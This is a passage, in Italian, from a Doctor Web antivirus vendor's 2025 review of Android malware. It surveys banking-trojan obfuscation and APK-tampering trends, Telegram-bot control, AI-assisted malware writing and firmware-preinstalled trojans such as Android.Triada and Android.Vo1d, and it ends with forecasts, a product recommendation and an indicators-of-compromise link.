&lt;p&gt;Nel 2025 gli autori di virus hanno continuato a utilizzare le varie tecniche di protezione dei trojan Android bancari dall'analisi e dal rilevamento. Ad esempio, si sono diffusi gli svariati metodi di offuscamento e occultamento di codice, quale DEX to C (conversione di codice DEX eseguibile in codice di linguaggio C), nonché l'offuscamento di applicazioni malevole tramite lo strumento NP Manager.&lt;/p&gt;

&lt;p&gt;Sono rimaste popolari le tecniche di manipolazione con il formato degli archivi ZIP, i quali in effetti sono i file APK di applicazioni Android. Tra queste sono la manipolazione con i campi &lt;span class="string"&gt;compression method&lt;/span&gt; e &lt;span class="string"&gt;compressed size&lt;/span&gt; nella struttura dell'intestazione del file locale all'interno dell'APK, nonché l'uso di dati su disco non corretti nel record ECDR e CD. Ne abbiamo parlato in maggior dettaglio in una &lt;a href="https://news.drweb-av.it/show/review/?i=14970#troj" target="_blank"&gt;panoramica recente&lt;/a&gt; nella sezione sui trojan bancari. A seguito di tali manipolazioni, i programmi trojan rimangono completamente operativi, ma molti strumenti di analisi statica li percepiscono come danneggiati e non sono in grado di elaborarli correttamente.&lt;/p&gt;

&lt;p&gt;Gli attori di minacce hanno cominciato ad adoperare più attivamente i programmi dropper per nascondere il payload principale, ad esempio, per aggirare la protezione interna dello store Google Play. I cybercriminali utilizzano anche gli assistenti di intelligenza artificiale durante la scrittura del codice di trojan bancari, il che ne semplifica lo sviluppo e porta alla comparsa di nuove famiglie. Oltre a questo, i malintenzionati impiegano più spesso i bot Telegram per la gestione di trojan bancari e l'esfiltrazione di dati da dispositivi infetti.&lt;/p&gt;

&lt;h3&gt;Prospettive e tendenze&lt;/h3&gt;

&lt;p&gt;Nel 2025 abbiamo osservato un'alta attività dei trojan pubblicitari, che rimangono le minacce per SO Android più diffuse. Di nuovo erano largamente diffusi anche i vari programmi falsificazione utilizzati per scopi fraudolenti, tra l'altro, per il phishing e il furto di denaro. Oltre a ciò, è continuata la crescita del numero di attacchi con l'utilizzo dei trojan bancari. Tutte queste applicazioni malevole sono una fonte di reddito illegale per i cybercriminali, pertanto, la loro popolarità rimarrà a un livello elevato. L'anno prossimo molto probabilmente esse di nuovo saranno uno dei popolari strumenti di guadagno dei malintenzionati. Allo stesso tempo, i malintenzionati impiegano sempre più spesso i bot Telegram per la gestione di trojan bancari. Questa tendenza molto probabilmente continuerà.&lt;/p&gt;

&lt;p&gt;La comparsa del programma malevolo &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, nonché delle nuove versioni dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; nei firmware di smartphone e TV box indica un continuo interesse dei malintenzionati a distribuire malware nei modi che ne rendono molto più difficile il rilevamento. È molto probabile che nel nuovo anno la tendenza si manterrà, e vedremo nuovi casi di preinstallazione di applicazioni malevole su smartphone, TV box e altri tipi di dispostivi Android.&lt;/p&gt;

&lt;p&gt;Ci si può aspettare anche la comparsa di programmi malevoli più complessi, capaci di eseguire un ampio spettro di compiti. Tra di essi possono essere ulteriori backdoor e vari trojan spia. Oltre a ciò, gli attori di minacce molto probabilmente di nuovo utilizzeranno gli store di programmi ufficiali, incluso Google Play, per la collocazione in essi di software malevoli e indesiderati.&lt;/p&gt;

&lt;p&gt;I malintenzionati anche continueranno a incorporare i vari metodi di protezione per gli strumenti da loro creati. Inoltre, utilizzeranno più spesso gli assistenti basati sull'IA durante la scrittura di codice, e in conseguenza di ciò, ci si può aspettare la comparsa di un numero maggiore di nuove famiglie.&lt;/p&gt;

&lt;p&gt;L'azienda Doctor Web monitora il panorama delle minacce nel segmento mobile e risponde prontamente alle sfide che emergono. Agli utenti di Android consigliamo di installare Dr.Web Security Space per dispositivi mobili per proteggersi dai programmi malevoli e da altri programmi pericolosi.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item></channel></rss>
